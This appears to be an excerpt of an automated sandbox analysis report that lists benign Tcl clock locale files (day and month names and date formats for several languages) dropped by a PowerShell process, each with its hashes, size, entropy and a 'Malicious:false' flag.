                                                                                                                                                                                                                      SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                      MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                      SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                      SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                      SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1874
                                                                                                                                                                                                                      Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                      MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                      SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                      SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                      SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                      MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                      SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                      SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                      SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2149
                                                                                                                                                                                                                      Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                      MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                      SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                      SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                      SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):419
                                                                                                                                                                                                                      Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                      MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                      SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                      SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                      SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2359
                                                                                                                                                                                                                      Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                      MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                      SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                      SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                      SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1183
                                                                                                                                                                                                                      Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                      MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                      SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                      SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                      SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2165
                                                                                                                                                                                                                      Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                      MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                      SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                      SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                      SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1471
                                                                                                                                                                                                                      Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                      MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                      SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                      SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                      SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3385
                                                                                                                                                                                                                      Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                      MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                      SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                      SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                      SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):319
                                                                                                                                                                                                                      Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                      MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                      SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                      SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                      SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):780
                                                                                                                                                                                                                      Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                      MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                      SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                      SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                      SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):347
                                                                                                                                                                                                                      Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                      MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                      SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                      SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                      SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                                      Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                      MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                      SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                      SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                      SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33777
                                                                                                                                                                                                                      Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                      MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                      SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                      SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                      SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                      Malicious:false
